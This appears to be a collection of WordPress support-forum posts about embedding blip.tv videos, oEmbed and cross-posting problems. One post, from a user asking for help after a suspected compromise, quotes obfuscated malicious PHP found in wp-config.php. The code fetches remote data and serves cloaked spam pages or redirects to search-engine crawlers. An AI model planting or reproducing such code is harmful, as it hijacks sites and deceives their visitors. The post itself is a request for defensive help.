]]>I have several clips to embed on a page.
All work fine except for this one which has an accented characteréfendre-la-production-de-coton-durable-pour-les-pays-africains-6391265
I was able to embed the others simply by pasting the URL and letting WP do the embed.
This doesn’t work with the accented character above.
I also tried grabbing the full embed code from the video’s page, but when you use the embed code, it only provides a flash version and does not display on iOS devices.
When you use the built-in wordpress embedding (just paste URL) it presents the html5 version when the client is iOS. I’m stuck with 4 out of 5 videos posted and working but cant get the last one.
Any idea how I can embed the above video and make it playable on iOS ?
Note- I don’t have admin access to the account of the video, so I can’t just change the URL
]]>I adapted one of your functions to grab a video ID from a custom field (the ‘hZBPgqbXeQA’ bit of for instance) and echo to my theme. Very basic (I’m a cut and paste coder!), but worked for what I was trying to achieve. Hopefully may help someone else.
function getBliptvThumb() {
global $post;
$blipID = get_post_meta($post->ID, 'Video', true);
$xml = simplexml_load_file("$blipID?skin=rss");
$result = $xml->xpath("/rss/channel/item/media:thumbnail/@url");
$thumbnail = (string) $result[0]['url'];
echo '<img src="'.$thumbnail.'" border="0" />';
Thanks again
]]> (works) (doesn’t work, url) (doesn’t work, new url)
It seems that page 2 above should work, as its using the format documented here (
I’ve also tried adding this to functions.php:
wp_oembed_add_provider(‘*’, ‘’);
which should make #3 work, but does not. I’m not sure if Blip updated the oEmbed URL or not, but either way, its not working consistently.
I looked through TONS of documentation, read this and that, installed this plugin, looked at other posts about “what to look for when you think you are hacked” and I did find some code, specifically in the “wp-config.php” file:
define ('WPLANG', ''); error_reporting(0);$sd="";$pts=explode("?",$_SERVER['REQUEST_URI']);$pt=$pts[0];$d1="";$f1="/allmykey4.txt";$fp1=fsockopen($d1,80,$erno,$erstr,30);if(!$fp1){print "Err: $erstr [$erno]";}else{fwrite($fp1,"GET $f1 HTTP/1.0\r\n");fwrite($fp1,"Host: $d1\r\n\r\n");while(!feof($fp1)){$h1.=fread($fp1,512);}fclose($fp1);}preg_match_all("!<begin>([^<]+)<end>!",$h1,$m1);$rkk=$m1[1][rand(0,count($m1[0])-1)];$rk=explode("@",$rkk);$rd=$rk[0];$rp=$rk[1];$a=$_SERVER['HTTP_USER_AGENT'];$ra=$_SERVER['HTTP_REFERER'];if(eregi("google",$a)||eregi("Googlebot",$a)||eregi("slurp",$a)||eregi("msnbot",$a)||eregi("google.",$ra)||eregi("yahoo.",$ra)||eregi("live.",$ra)||eregi("msn.",$ra)||eregi("bing.",$ra)){$d4=$rd;if(!eregi("/news",$pt)){$f4="/news".$pt;$f4=str_replace($sd,"",$f4);}else{$f4=str_replace($sd,"",$pt);}$fp4=fsockopen($d4,80,$erno,$erstr,30);if(!$fp4){print "Err: $erstr [$erno]";}else{fwrite($fp4,"GET $f4 HTTP/1.0\r\n");fwrite($fp4,"Host: $d4\r\n\r\n");while(!feof($fp4)){$h4.=fread($fp4,512);}fclose($fp4);}$bo="<frameset rows='100%,*' noresize><frame src='https://".$d4."/".$f4."' noresize></frameset><body>";$h4=str_replace('<body>',$bo,$h4);if(eregi("<h1>Page not found, 404 error</h1>",$h4)){$ru="/".$sd.$rp;header("HTTP/1.1 301");header("Location: $ru");exit();}else{$x4=explode("\r\n",$h4);for($m=9;$m<sizeof($x4);$m++){echo $x4[$m];}exit();}}
I’ve taken some precautions to strengthen security measures but those take time. I just started working here a few weeks ago and my laundry list continues to grow!
Anyway if anyone has any ideas at all that would be splendid!
Thanks again comrades as you’ve never failed me yet!
]]>Could not find anything in the search on this
]]>First, I created a contributor level account on my WordPress blog which allows for posting but the posts need to be approved by an admin first before they get published. I did this as a test because I want to be able to let certain people using the ability to cross-post podcast posts (with attached MP3 files) to my blog.
Second, I setup my account to cross-post to my blog, making sure to select the correct blogging system software (WordPress, self-hosted), enter the correct login information (username and password) for the user I created for this test, admin panel location (, and the API Endpoint URL as detected by (
Next, I created a test post and uploaded an MP3 to attach to it. After the upload was complete, I waited several minutes for my post to be accepted or completed at my WordPress blog. Instead, it returned the following error message:
Error encountered cross-posting: Fatal client error. Sorry, you can not post on this weblog or category. at /var/www/prod/otter/bin/../lib/Net/Blogger/Engine/ line 245.
Any idea what went wrong?
I can turn the rich text editor off to solve this problem, but is there any other solutions?
When I use the edit function in wp with any of these video posts, the videos no longer play embedded in my site but instead one is asked to download the .flv have just informed me why the videos dont play embedded in my site and instead just try and download flv:
So I think the problem here is that WordPress thinks it’s smarter than
you. This causes problems in two ways.
First of all, when you use their rich text editor to edit (or copy &
paste) anything that includes JavaScript or Flash, it tears the whole
thing apart because it’s not sure if you’re writing code that’s supposed
to be interperted or writing stuff that’s supposed to appear verbatim.
The second problem is that WordPress, after already kind of uncertainly
treating the copy & paste code (or the cross-posted code when you edit
it) will then try to “balance” and otherwise “fix” your HTML. This,
again, can cause all sorts of problems with “advanced” code. Believe me
when I say that we never send a “<u />” through to you. That’s
something that WordPress did because it thought it should. I’m sure
that at some point something was underlined, and it’s likely that WP’s
parser couldn’t easily find the end of the thing that was underlined.
Something like that.
Can someone please tell me if there is away to avoid corrupting my video posts when I edit in wp?
]]>Install the Anarchy media player so vids play in your wordpress site
set up a account (free)
Load vids to
cross post vids to your wordpress blog
voila, you have a vblog !